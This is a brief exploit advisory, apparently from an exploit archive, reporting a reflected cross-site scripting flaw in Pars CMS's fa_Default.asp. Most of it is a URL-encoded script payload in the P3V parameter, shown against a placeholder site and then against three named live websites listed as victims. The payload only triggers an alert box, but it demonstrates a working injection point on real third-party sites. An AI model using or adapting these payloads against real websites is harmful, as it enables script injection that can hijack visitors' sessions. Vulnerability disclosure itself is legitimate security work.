Pars CMS suffers from a cross site scripting vulnerability.
36456a3b75306fe13b8d212e79ed4deb7c53fbbeb3c7bbf9984584bdb61b5388
#########################################################
---------------------------------------------------------
Portal Name: Pars Cms
Vendor : http://Parscms.com
Vulnerable File : fa_Default.asp
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : XSS (Cross site scripting)
---------------------------------------------------------
#########################################################
http://www.site.com/fa_Default.asp?RP=p_Content_Search.asp&P3V=%27%3E%3Cscript%3Ealert%28%27Pouya_Server%27%29%3C%2Fscript%3E
---------------------------------
Victem :
http://www.parscms.com/fa_Default.asp?RP=p_Content_Search.asp&P3V=%27%3E%3Cscript%3Ealert%28%27Pouya_Server%27%29%3C%2Fscript%3E
http://www.iransdp.com/fa_default.asp?RP=p_Content_Search.asp&P3V=%27%3E%3Cscript%3Ealert%28%27Pouya_Server%27%29%3C%2Fscript%3E
http://www.ymrt.ir/Fa_default.asp?RP=p_Content_Search.asp&P3V=%27%3E%3Cscript%3Ealert%28%27Pouya_Server%27%29%3C%2Fscript%3E